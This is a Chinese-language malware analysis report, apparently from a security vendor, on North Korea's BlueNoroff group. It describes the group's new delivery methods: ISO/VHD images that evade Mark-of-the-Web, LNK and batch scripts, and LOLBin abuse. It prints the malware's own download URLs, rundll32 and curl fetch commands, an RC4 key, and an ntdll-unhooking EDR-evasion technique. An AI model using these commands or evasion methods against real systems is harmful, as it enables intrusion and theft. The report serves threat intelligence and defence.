.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
BlueNoroff據說是一個朝鮮黑客組織,其攻擊主要充滿經濟動機。最近有消息報導,它創建70多個虛假域名並冒充銀行和風險投資公司後竊取了數百萬美元的加密貨幣。根據調查,大多數域名模仿日本風險投資公司,表明BlueNoroff對該國用戶和公司數據的濃厚興趣。
今年10月,我們觀察到其武器庫中採用了新的惡意軟件。該組織通常利用Word文檔,並使用快捷方式進行初始攻擊。然而,它最近開始採用新的惡意軟件傳播方法。
該組織採用的第一個新方法旨在規避網絡標記(MOTW)標誌,即當用戶試圖打開從互聯網下載的文件時,Windows會顯示警告信息的安全措施。為此,使用了光盤映像(.iso擴展名)和虛擬硬盤(.vhd擴展名)文件格式。這是當今逃避MOTW的常用策略,BlueNoroff也採用了這一策略。
此外,該組織還測試了不同的文件類型,以改進惡意軟件的傳播方法。我們觀察到一個新的Visual Basic腳本,一個以前未見過的Windows批處理文件和一個Windows可執行文件。 BlueNoroff幕後的攻擊者似乎正在擴展或嘗試新的文件類型,以有效地傳播他們的惡意軟件。
在研究了他們使用的基礎設施後,我們發現這個組織使用了70多個域名,這意味著他們直到最近都非常活躍。此外,他們還創建了大量看起來像風險投資和銀行域名的假域名。大多數域名模仿日本風險投資公司,表明該組織對日本金融實體有著廣泛的興趣。
BlueNoroff組織引入了新的文件類型來規避網絡標記(MOTW)安全措施;
BleuNoroff組織擴展了文件類型並調整了感染方法;
BlueNoroff創建了大量假冒風險投資公司和銀行的假域名。
背景
在2022年9月底,我們在追踪分析中觀察到新的BlueNoroff惡意軟件。經過仔細的調查,我們確認攻擊者採用了新的技術來傳達最終的負載。攻擊者利用了幾個腳本,包括Visual Basic腳本和Windows批處理腳本。他們還開始使用磁盤鏡像文件格式.iso和.vhd來傳播他們的惡意軟件。對於中間感染,攻擊者引入了一個下載程序來獲取和生成下一階段的有效負載。儘管最初的攻擊方法在這次活動中有很大不同,但我們之前分析的最終有效負載沒有發生重大變化。
新型感染鏈
持久攻擊的初始感染
根據追踪分析,我們觀察到阿聯酋的一名受害者受到了惡意Word文檔的攻擊。受害人於2022年9月2日收到了一份名為“Shamjit Client Details Form.doc”的文件。不幸的是,我們無法獲取該文檔,但它是從以下路徑執行的:
從文件路徑來看,我們可以假設受害者是銷售部門負責簽署合同的員工
啟動後,惡意文檔連接到遠程服務器並下載有效負載。在這種特殊情況下,可執行文件ieinstal.exe用於繞過UAC。
遠程URL:https://bankofamerica.us[.]org/lsizTZCslJm/W+Ltv_Pa/qUi+KSaD/_rzNkkGuW6/cQHgsE=
已創建負載路徑:%Profile%\cr.dat
衍生命令:cmd.exe%Profile%\cr.dat 5pKwgIV5otiKb6JrNddaVJOaLjMkj4zED238vIU=
初次感染後,我們觀察到攻擊者進行了幾次鍵盤操作。通過植入的後門,他們試圖對受害者進行指紋識別,並安裝具有高級權限的額外惡意軟件。在感染後,攻擊者執行了幾個Windows命令來收集基本的系統信息。 18小時後,他們又回來安裝了具有更高權限的惡意軟件。
後利用當惡意Word文檔打開時,它會從遠程服務器獲取下一個有效負載:
下載URL:http://avid.lno-prima[.]lol/VcIf1hLJopY/shU_pJgW2Y/KvSuUJYGoa/sX+Xk4Go/gGhI=
提取的有效負載應保存在%Profile%\update.dll中。最終,提取的文件由以下命令生成:
命令#1:rundll32.exe%Profile%\update.dll,#1 5pOygIlrsNaAYqx8JNZSTouZNjo+j5XEFHzxqIIqpQ==
命令#2:rundll32.exe%Profile%\update.dll,#1 5oGygYVhos+IaqBlNdFaVJSfMiwhh4LCDn4=
BlueNoroff組織通常使用的另一種方法是帶有快捷方式文件的ZIP存檔。我們最近發現的存檔文件包含一個受密碼保護的誘餌文檔和一個名為“Password.txt.lnk”的快捷方式文件。這是經典的BlueNoroff策略,說服受害者執行惡意快捷方式文件以獲取誘餌文檔的密碼。最新發現的檔案文件(MD5 1e3df8ee796fc8a13731c6de1aed0818)有一個日文文件名,新しいボ,ナススケジュ,ル.zip(日文“新獎金計劃”),表明他們對日本目標感興趣。
與前一個快捷方式示例的主要區別在於,它獲取了額外的腳本負載(Visual Basic腳本或HTML應用程序),此外,此時還採用了另一種獲取和執行下一階段有效負載的方法。受害者雙擊快捷方式文件時執行了以下命令:
為了逃避檢測,攻擊者使用了Living Off the Land Binaries (LOLBins)
DeviceCredentialDeployment執行是一個眾所周知的LOLBin,用於隱藏命令的窗口。攻擊者還濫用msiexe.exe文件,以靜默方式啟動獲取的Windows安裝程序文件。
方法1:規避MOTW標誌的技巧我們觀察到攻擊者檢查了不同的文件類型來傳遞他們的惡意軟件。最近,許多攻擊者採用圖像文件來避免MOTW (web標記)。簡而言之,MOTW是微軟引入的一種緩解技術。 NTFS文件系統標記從互聯網下載的文件,Windows以安全的方式處理該文件。例如,當從互聯網獲取Microsoft Office文件時,操作系統在受保護視圖中打開它,這限制了嵌入宏的執行。為了避免這種緩解技術,越來越多的攻擊者開始濫用ISO文件類型。 BlueNoroff組織很可能用ISO鏡像文件來傳播他們的惡意軟件。雖然它仍在開發中,但我們將此示例作為預警。此ISO圖像文件包含一個PowerPoint幻燈片放映和一個Visual Basic腳本。
ISO鏡像的嵌入式文件
Microsoft PowerPoint文件包含鏈接。當用戶點擊鏈接時,它將執行1.vbs文件。當我們檢查VBS文件時,它只生成了一個“ok”消息,這表明BlueNoroff仍在嘗試這種方法。
根據其他發現,我們從VirusTotal中發現了一個野外示例(MD5 a17e9fc78706431ffc8b3085380fe29f)。在分析時,此.vhd示例未被任何反病毒軟件檢測到。虛擬磁盤文件包括偽造的PDF文件、Windows可執行文件和加密的Dump.bin文件。 PDF和可執行文件在文件擴展名前有許多空格,以隱藏它並減少懷疑。
VHD文件裡面的一個文件
Job_Description[spaces].exe文件(MD5 931d0969654af3f77fc1dab9e2bd66b1)是加載下一階段有效負載的加載器。在啟動時,它將Dump.bin文件複製到%Templates%\war[current time][random value].bin (i.e. war166812964324445.bin). Dump.bin中PE頭被修改。惡意軟件讀取Dump.bin的第一個字節,即該文件中的0xAF,並使用該密鑰解碼0x3E8字節。解密後的數據是PE文件的頭文件,將恢復後的頭文件覆蓋到原文件中。最後,它通過生成普通的第一個導出函數來加載解密的DLL文件。
生成的下載程序在文件的末尾包含一個加密的配置。惡意軟件首先從文件末尾獲取配置數據的總大小和有效負載URL的長度。它們分別位於文件末尾的4字節和8字節處。惡意軟件使用嵌入的64字節密鑰,使用RC4算法解密配置數據。
RC4秘鑰:46 61 44 6D 38 43 74 42 48 37 57 36 36 30 77 6C 62 74 70 57 67 34 6A 79 4C 46 62 67 52 33 49 76 52 77 36 45 64 46 38 49 47 36 36 37 64 30 54 45 69 6D 7A 54 69 5A 36 61 42 74 65 69 50 33。
恢復URL: hxxps://docs.azure-protection[.]cloud/EMPxSKTgrr3/2CKnoSNLFF/0d6rQrBEMv/gGFroIw5_m/n9hLXkEOy3/wyQ%3D%3D
配置結構
然而,在另一個下載程序的示例中,有效負載URL是使用命令行參數傳播的。另外,一些其他下載程序(MD5 f766f97eb213d81bf15c02d4681c50a4)具有檢查工作環境的功能。如果物理內存小於2147,483,648字節,惡意軟件將終止執行。
下載程序感染流
此下載程序檢查以下防病毒供應商的名稱:Sophos、Kaspersky、Avast、Avira、Bitdefender、TrendMicro和Windows Defender。如果安裝了TrendMicro、BitDefender或Windows Defender產品,則惡意軟件會執行一個經典的解鎖DLL技巧,以從系統庫中刪除用戶模式掛鉤。這種規避技術會用新加載的ntdll庫覆蓋預加載的ntdll庫的.text部分,以便使用原始API地址恢復掛接的API地址。使用此技巧,惡意軟件可以禁用EDR/AV產品的功能。接下來,惡意軟件創建一個互斥鎖以避免重複執行。
互斥名稱:da9f0e7dc6c52044fa29bea5337b4792b8b873373ba99ad816d5c9f5f275f03f
接下來,惡意軟件在同一目錄中打開一個PDF誘餌文檔。這份假文件偽裝成一家日本跨國銀行提供的工作邀請。
如果受害者的電腦上安裝了Windows Defender或Bitdefender Antivirus,惡意軟件就會執行以下命令:
Windows Defender: cmd /c timeout /t 10 Del /f /q \”[current file name]\” attrib -s -h \”[PDF decoy file]\” rundll32 \”[current DLL file path]\” #1;
Bitdefender: cmd /c timeout /t 10 rundll32 \”[current DLL file path]\” #1;
這種惡意軟件的主要目標是獲取下一階段的有效負載。為此,惡意軟件使用cURL庫,根據安裝的防病毒軟件組合cURL命令。
Avira or Avast installed: curl -A cur1-agent -L [payload URL(| -x proxy URL)] -s -d da;
Other cases: curl -A cur1-agent -L [payload URL(| -x proxy URL)] -s -d dl;
注意,用戶代理名稱為“cur1-agent”,如果受害者安裝了Avira或Avast,惡意軟件會發送“da”POST數據。否則,惡意軟件將發送“dl”POST數據。如果cURL命令獲取的數據包含“
如果安裝了Avira或Avast,惡意軟件將解密的有效負載保存到“%TEMPLATES%\marcoor.dll”,並使用帶有有效負載URL的rundll32.exe命令生成它。
command: exe %TEMPLATES%\marcoor.dll #1 [payload URL]
否則,惡意軟件不會將有效負載寫入文件,而是將獲取的有效負載注入explorer.exe進程。所獲取的有效負載是一個DLL類型的可執行文件,其導出函數由“有效負載URL”派生。
不幸的是,到目前為止,我們還無法獲得精確的感染鏈。然而,從分析數據中,我們可以確認受害者最終是被後門類型的惡意軟件攻擊的。基於惡意軟件的靜態信息和部分內部代碼,我們評估最終的有效負載仍然與我們在上一篇文章中描述的Persistence Backdoor#2非常相似。
方法2:腳本和小說下載程序此外,我們還觀察到可疑批處理文件的下載和啟動。攻擊者利用了不同的lolbin。惡意軟件的執行是使用system目錄下合法的script, SyncAppvPublishingServer.vbs, 完成的。此腳本用於通過Windows計劃任務執行PowerShell腳本。
我們還在分析中觀察到了該批處理文件的上下文。批處理文件名為“What is Blockchain.bat”。顧名思義,該組織仍然以區塊鏈行業為目標。為此,我們提取了批處理文件的scriptlet。
Inproc.exe是合法的mshta.exe文件(MD5 0b4340ed812dc82ce636c00fa5c9bef2), rwinsta.exe是合法的rundll32.exe文件(MD5 ef3179d498793bf4234f708d3be28633)。 Blockchain.pdf文件是mshta.exe進程生成的惡意HTML應用程序文件。雖然沒有HTA腳本(Blockchain.pdf),但我們可以基於假設腳本的功能顯示誘餌文檔並獲取下一階段的有效負載。
此外,我們觀察到該組織在此時引入了一個新的Windows可執行類型的下載程序。這個惡意軟件(MD5 087407551649376d90d1743bac75aac8)在獲取遠程有效負載並執行時生成一個假密碼文件。在執行時,它創建一個假文件(wae.txt)來顯示由字符串“password”組成的密碼,並從嵌入的URL中獲取有效負載並加載它。該方案通過notepad.exe顯示密碼,這是BlueNoroff組織為了避免引起受害者的懷疑而慣用的伎倆。通常,密碼包含打開所提供的加密誘餌文檔所需的密碼。
含有假密碼文件的下載
攻擊者可能將上述Windows可執行文件以壓縮文件格式或磁盤映像文件格式與加密的誘餌文檔一起傳播。
基礎設施
在進行這項研究時,我們發現了攻擊者使用的幾個C2服務器。與往常一樣,所有服務器都由VPS供應商託管,其中幾個服務器被解析到相同的IP地址。域名註冊可以追溯到2021年早些時候。
攻擊者通常使用假域名,如雲託管服務來託管惡意文件或有效負載。他們還創建了偽裝成金融業合法公司和投資公司的假域名。這些域名,包括旋轉域名(pivoted domain),模仿風險資本名稱或大型銀行名稱。大多數公司都是日本公司,這表明這位演員對日本市場非常感興趣。
受害者分析正如我們在“持久攻擊的初始感染”一節中所描述的那樣,我們發現阿聯酋的一個受害者(可能是一家家庭融資公司)受到了經典的BlueNoroff組織的攻擊。這個以經濟為動機的攻擊組織最近一直在攻擊各種與加密貨幣相關的業務,以及其他金融公司。
總結根據最近的一份報告,BlueNoroff組織利用他們的網絡攻擊能力竊取了價值數百萬美元的加密貨幣。這表明這個組織有很強的經濟動機,正如我們從最新的發現中看到的,這個臭名昭著的攻擊者已經對他們的惡意軟件進行了迭代。這也表明,在不久的將來,它將發起更大的攻擊。